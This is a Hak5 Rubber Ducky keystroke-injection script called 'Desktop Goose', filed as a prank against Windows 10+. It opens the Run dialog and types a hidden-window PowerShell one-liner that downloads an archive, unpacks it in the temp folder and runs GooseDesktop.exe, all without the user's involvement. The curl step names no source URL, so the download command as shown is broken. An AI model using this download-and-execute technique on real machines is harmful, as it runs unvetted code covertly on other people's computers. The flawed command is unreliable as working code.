REM Title: Desktop Goose REM Author: FalsePhilosopher REM Target: Windows 10+ REM Props: Hak5, for the honks,jakoby for some PS bits I used, 3ctOs for the PS bits I used and memes REM Version: 1.0 REM Category: Prank REM Downloads and lets loose THE GOOSE!He'll nab your mouse, track mud on your screen... leave you a message, deliver you memes? REM REM startup delay DELAY 300 GUI r DELAY 500 STRING powershell DELAY 2000 STRING powershell -w h ($Z="$env:TMP"+'\');$D="$env:TMP"+'\dg';curl -O $Z;Expand-Archive $Z -DestinationPath $D\ -Force;$file="$env:TMP"+'\dg\GooseDesktop.exe';$exec=New-Object -com shell.application;$exec.shellexecute($file);exit ENTER